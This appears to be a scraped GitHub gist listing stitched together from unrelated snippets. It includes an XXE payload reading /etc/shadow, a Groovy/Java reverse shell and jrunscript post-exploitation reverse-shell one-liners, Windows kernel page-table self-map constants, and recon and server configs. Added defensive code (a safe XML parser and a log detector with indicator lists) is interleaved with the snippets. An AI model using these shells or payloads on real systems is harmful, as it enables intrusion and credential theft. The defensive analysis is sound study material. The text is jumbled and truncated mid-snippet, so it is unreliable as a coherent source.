Ihebski ihebski
#!/usr/bin/python
# raspberry pi nrf24l01 hub
# more details at http://blog.riyas.org
# Credits to python port of nrf24l01, Joao Paulo Barrac & maniacbugs original c library
from nrf24b import NRF24
import time
from time import gmtime, strftime
import sys, string
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
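The payload above only reads /etc/shadow if the receiving parser resolves the external entity. As an added example, not part of the gist, the Python below shows the defender's side with only the standard library: a pre-parse check that flags DOCTYPE declarations carrying SYSTEM or PUBLIC entities, a strict policy that refuses any DOCTYPE from untrusted input, and a parse through xml.sax with external general entities explicitly disabled, so `&xxe;` contributes no text and no file is opened. The payload string is the one from the gist; the benign document is constructed.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Payload from the gist above: one external general entity pointing at a local file.
XXE_PAYLOAD = (
    '<!DOCTYPE foo [\n'
    '<!ELEMENT foo ANY >\n'
    '<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>'
)

# Constructed benign document for comparison (not from the page).
BENIGN_DOC = "<foo>hello</foo>"

# External entities can only be declared inside a DOCTYPE, and they are the ones
# that carry a SYSTEM or PUBLIC identifier; that is the signature to look for.
_EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)


def _as_bytes(doc):
    return doc.encode("utf-8") if isinstance(doc, str) else doc


def has_external_entity(doc) -> bool:
    """True if the document declares an external (SYSTEM/PUBLIC) entity."""
    return _EXTERNAL_ENTITY_RE.search(_as_bytes(doc)) is not None


def reject_doctype(doc) -> bytes:
    """Strict policy for untrusted input: refuse any DOCTYPE at all.

    Clients almost never need to ship a DTD, and refusing it up front also blocks
    entity-expansion (billion laughs) and parameter-entity tricks that a
    SYSTEM/PUBLIC regex alone would miss.
    """
    raw = _as_bytes(doc)
    if _DOCTYPE_RE.search(raw):
        raise ValueError("DOCTYPE not allowed in untrusted XML")
    return raw


class _TextCollector(ContentHandler):
    """Collects character data so the caller can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text_without_external_entities(doc) -> str:
    """Parse with xml.sax and external general entities disabled.

    Python 3.7.1 and later already default feature_external_ges to False; setting
    it explicitly documents the intent and protects code run on older interpreters.
    With the feature off, expat is told to skip the external entity, so `&xxe;`
    yields no text and the file named in the entity is never opened.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(_as_bytes(doc)))
    return "".join(collector.parts)


if __name__ == "__main__":
    print("external entity in payload:", has_external_entity(XXE_PAYLOAD))
    print("text after safe parse:", repr(parse_text_without_external_entities(XXE_PAYLOAD)))
    try:
        reject_doctype(XXE_PAYLOAD)
    except ValueError as exc:
        print("strict policy:", exc)
```

The regex check is a cheap gate for logging and WAF-style filtering; the parser feature is what actually prevents the read, and the DOCTYPE refusal is the setting to use wherever the application does not need DTDs at all.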
@ihebski
ihebski / revsh.groovy
Created March 5, 2019 14:06 — forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@ihebski
ihebski / JVM_POST_EXPLOIT.md
Created July 29, 2019 22:27 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
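The encoded variant is the form that survives in process-creation logs, so detection has to decode it before matching. As an added example, not part of the gist, the Python below takes constructed command-line records, extracts the argument of `parseBase64Binary("...")`, decodes it, and scores both the raw and decoded text for the building blocks of these one-liners: `java.lang.ProcessBuilder`, `Runtime.getRuntime().exec`, `java.net.Socket` and a shell binary. The encoded sample is the Nashorn one-liner from this gist, base64-encoded inside the script because the page's own blob is truncated; hostnames, users and timestamps are made up.

```python
import base64
import re

# The Nashorn reverse-shell one-liner from the gist above, used to build a
# realistic encoded sample (the gist's own base64 blob is truncated on the page).
NASHORN_REVSH = (
    'var host="localhost"; var port=8044; var cmd="cmd.exe"; '
    'var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();'
    'var s=new java.net.Socket(host,port);'
    'var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();'
    'var po=p.getOutputStream(),so=s.getOutputStream();'
    'while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());'
    'while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());'
    'so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};'
    'p.destroy();s.close();'
)
ENCODED = base64.b64encode(NASHORN_REVSH.encode()).decode()

# Constructed process-creation records (hosts, users and timestamps are invented).
SAMPLE_LOG = [
    "2019-07-29T22:27:01Z host=build01 user=svc_jenkins cmdline=jrunscript -e '"
    + NASHORN_REVSH + "'",
    "2019-07-29T22:28:14Z host=build01 user=svc_jenkins cmdline=jrunscript -e "
    "'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary(\""
    + ENCODED + "\")))'",
    "2019-07-29T22:30:00Z host=build02 user=dev cmdline=jrunscript -e 'print(1+1)'",
    "2019-07-29T22:31:45Z host=build02 user=dev cmdline=java -jar app.jar --port 8080",
]

# Building blocks of the JVM one-liners; each is an independent indicator.
INDICATORS = [
    "java.lang.ProcessBuilder",
    "Runtime.getRuntime().exec",
    "java.net.Socket",
    "cmd.exe",
    "/bin/sh",
    "/bin/bash",
]

_B64_ARG_RE = re.compile(r'parseBase64Binary\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
_CMDLINE_RE = re.compile(r"cmdline=(.*)$")


def decode_embedded_base64(cmdline: str) -> str:
    """Return the decoded text of a parseBase64Binary("...") argument, or ''."""
    m = _B64_ARG_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeError):
        return ""


def find_indicators(text: str) -> list:
    return [i for i in INDICATORS if i in text]


def analyze_record(record: str) -> dict:
    """Score one record; the raw command line and any decoded payload are both checked."""
    m = _CMDLINE_RE.search(record)
    cmdline = m.group(1) if m else record
    decoded = decode_embedded_base64(cmdline)
    hits = sorted(set(find_indicators(cmdline) + find_indicators(decoded)))
    spawns_process = any(
        i in hits for i in ("java.lang.ProcessBuilder", "Runtime.getRuntime().exec")
    )
    return {
        "jrunscript_eval": "jrunscript" in cmdline and " -e " in cmdline,
        "encoded_payload": bool(decoded),
        "indicators": hits,
        # A script engine that both spawns a process and opens a socket is the shape
        # of the one-liners above, whichever encoding wraps them.
        "reverse_shell": spawns_process and "java.net.Socket" in hits,
    }


def flagged_records(records) -> list:
    return [r for r in records if analyze_record(r)["reverse_shell"]]


if __name__ == "__main__":
    for rec in SAMPLE_LOG:
        print(analyze_record(rec))
```

`jrunscript -e` on a build or application server is itself worth an alert at low severity; the decoded-payload indicators are what raise it to a reverse-shell finding.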
#!/bin/bash
# Fresh Debian-based install: keyboard layout, full upgrade, classic network tools
set -e
# change keyboard layout to fr (interactive prompt)
sudo dpkg-reconfigure keyboard-configuration
# upgrade system
sudo apt-get update
sudo apt full-upgrade -y
# net-tools provides ifconfig, which newer images no longer ship by default
sudo apt install -y net-tools
#include "stdafx.h"
// Windows x64 page-table self-map bases for the fixed PML4 self-reference slot 0x1ED.
// These addresses hold on Windows x64 releases before Windows 10 1607; from 1607 on
// the self-reference index is randomized at boot and must be derived at run time.
#define PML4_BASE 0xFFFFF6FB7DBED000
#define PDP_BASE 0xFFFFF6FB7DA00000
#define PD_BASE 0xFFFFF6FB40000000
#define PT_BASE 0xFFFFF68000000000
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
#pragma pack(push,4)
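The four `*_BASE` constants are the classic Windows x64 page-table self-map: PML4 slot 0x1ED maps the page tables into the virtual address space, so the PTE, PDE, PDPE and PML4E for any virtual address sit at computable addresses, which is what kernel exploits rely on to flip page protections. As an added example, not from the gist, the Python below derives the four bases from the self-map index, computes the entry addresses for a given virtual address, and recovers the index from a leaked PT base, the extra step needed on Windows 10 1607 and later where the index is randomized and the header's constants no longer apply. The sample virtual address is made up.

```python
# Self-map index used by Windows x64 before 10 1607 (PML4 slot 0x1ED = 493).
SELF_MAP_INDEX = 0x1ED

# Constants from the header above, used to check the derivation.
PML4_BASE = 0xFFFFF6FB7DBED000
PDP_BASE = 0xFFFFF6FB7DA00000
PD_BASE = 0xFFFFF6FB40000000
PT_BASE = 0xFFFFF68000000000

CANONICAL_HIGH = 0xFFFF000000000000  # sign extension when bit 47 is set


def canonical(addr: int) -> int:
    """Sign-extend bit 47 into bits 48..63 (4-level paging canonical form)."""
    addr &= 0xFFFFFFFFFFFF
    return addr | CANONICAL_HIGH if addr & (1 << 47) else addr


def derive_bases(self_index: int) -> dict:
    """Self-map bases for a given PML4 index.

    Going through the self-referencing PML4 entry k times means the top k
    9-bit index fields of the resulting address are all `self_index`.
    """
    i = self_index
    return {
        "PT_BASE": canonical(i << 39),
        "PD_BASE": canonical((i << 39) | (i << 30)),
        "PDP_BASE": canonical((i << 39) | (i << 30) | (i << 21)),
        "PML4_BASE": canonical((i << 39) | (i << 30) | (i << 21) | (i << 12)),
    }


def pte_va(va: int, pt_base: int = PT_BASE) -> int:
    """Address of the PTE mapping `va`: bits 47..12 of va become the 8-byte entry index."""
    return pt_base + ((va >> 9) & 0x7FFFFFFFF8)


def pde_va(va: int, pd_base: int = PD_BASE) -> int:
    """Address of the PDE for `va`: bits 47..21 become the entry index."""
    return pd_base + ((va >> 18) & 0x3FFFFFF8)


def pdpe_va(va: int, pdp_base: int = PDP_BASE) -> int:
    """Address of the PDPE for `va`: bits 47..30 become the entry index."""
    return pdp_base + ((va >> 27) & 0x1FFFF8)


def pml4e_va(va: int, pml4_base: int = PML4_BASE) -> int:
    """Address of the PML4E for `va`: bits 47..39 become the entry index."""
    return pml4_base + ((va >> 36) & 0xFF8)


def self_map_index_from_pt_base(pt_base: int) -> int:
    """Recover the (possibly randomized) self-map index from a leaked PT base."""
    return (pt_base >> 39) & 0x1FF


def walk(va: int, bases: dict = None) -> dict:
    """All four entry addresses for `va`, plus the 9-bit indices for cross-checking."""
    b = bases or derive_bases(SELF_MAP_INDEX)
    return {
        "pml4_index": (va >> 39) & 0x1FF,
        "pdpt_index": (va >> 30) & 0x1FF,
        "pd_index": (va >> 21) & 0x1FF,
        "pt_index": (va >> 12) & 0x1FF,
        "pml4e": pml4e_va(va, b["PML4_BASE"]),
        "pdpe": pdpe_va(va, b["PDP_BASE"]),
        "pde": pde_va(va, b["PD_BASE"]),
        "pte": pte_va(va, b["PT_BASE"]),
    }


if __name__ == "__main__":
    sample_va = 0xFFFFF80012345678  # made-up kernel address
    for name, value in walk(sample_va).items():
        print(f"{name:11s} {value:#x}")
```

A useful sanity check is that the PTE of the PML4 page itself is the self-reference slot: `pte_va(PML4_BASE)` equals `PML4_BASE + 0x1ED * 8`, and the same identity holds for any index the bases were derived from.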
findomain-linux -o -t $TARGET -r | anew $TARGET.txt
@ihebski
ihebski / template
Created April 25, 2020 13:23
template nginx
server {
    listen 80;
    listen [::]:80;
    root /usr/share/ngnix/domain;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
}
@ihebski
ihebski / takengo.com.db
Created April 26, 2020 12:31
config dns zone
; BIND data file for takengo.com
;
$TTL 14400
@ IN SOA ns1.takengo.com. host.takengo.com. (
        201006601  ; Serial
        7200       ; Refresh
        120        ; Retry
        2419200    ; Expire
        604800 )   ; Negative caching TTL (RFC 2308); the record default TTL is the $TTL above
;
; A zone carries exactly one SOA record. The second SOA below duplicates the first and
; makes named reject the zone, so it is left commented out.
; @ IN SOA takengo.com. host.takengo.com. (
;       2010081401 ; Serial
;       28800      ; Refresh
;       604800     ; Retry
;       604800     ; Expire
;       86400 )    ; Negative caching TTL
        IN NS ns1.takengo.com.
; ns1.takengo.com lives inside this zone, so it also needs an A (glue) record, which the gist does not show.
; A PTR record belongs in the reverse (in-addr.arpa) zone; with owner "4" in this forward zone it only
; answers for 4.takengo.com, which is almost certainly not what was intended.
4 IN PTR takengo.com.